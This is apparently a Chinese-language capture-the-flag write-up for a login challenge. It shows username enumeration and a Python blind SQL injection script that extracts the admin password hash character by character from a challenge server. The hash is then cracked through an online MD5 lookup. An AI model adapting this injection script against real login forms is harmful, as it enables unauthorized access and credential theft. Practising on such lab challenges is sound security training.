解题思路:我用用户名admin,密码123456,提示密码错误
我用用户名admina,密码123456,提示用户名错误,说明用户名是admin
我的字典sql盲注无法破解密码,于是我在网上找了一个大佬写的pycharm脚本(记得安装requests库和改url)
import requests
import time
url = "http://114.67.246.176:13918"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
}
with requests.session() as s:
database = "passwd:"
s.keep_alive = False
s.adapters.DEFAULT_RETRIES = 5
for i in range(1, 32):
for j in range(48, 128):
sql = 'admi\'or((ascii(substr((select(password))from({0})))-{1}))--\''.format(i, j)
data = {'username': sql, 'password': "123"}
try:
res = s.post(url, data=data, timeout=5, headers=headers)
except:
time.sleep(2)
res = s.post(url, data=data, timeout=5, headers=headers)
if 'username does not exist' in res.text:
database += chr(j)
print(database)
break
res.close()
破解得到passwd:4dcc88f8f1bc05e7c2ad1a60288481a
将4dcc88f8f1bc05e7c2ad1a60288481a进行md5解密得到
得到密码bugctf,于是用用户名admin,密码bugctf登入得到flag
最后附上md5免费在线解密网址:
https://www.somd5.com/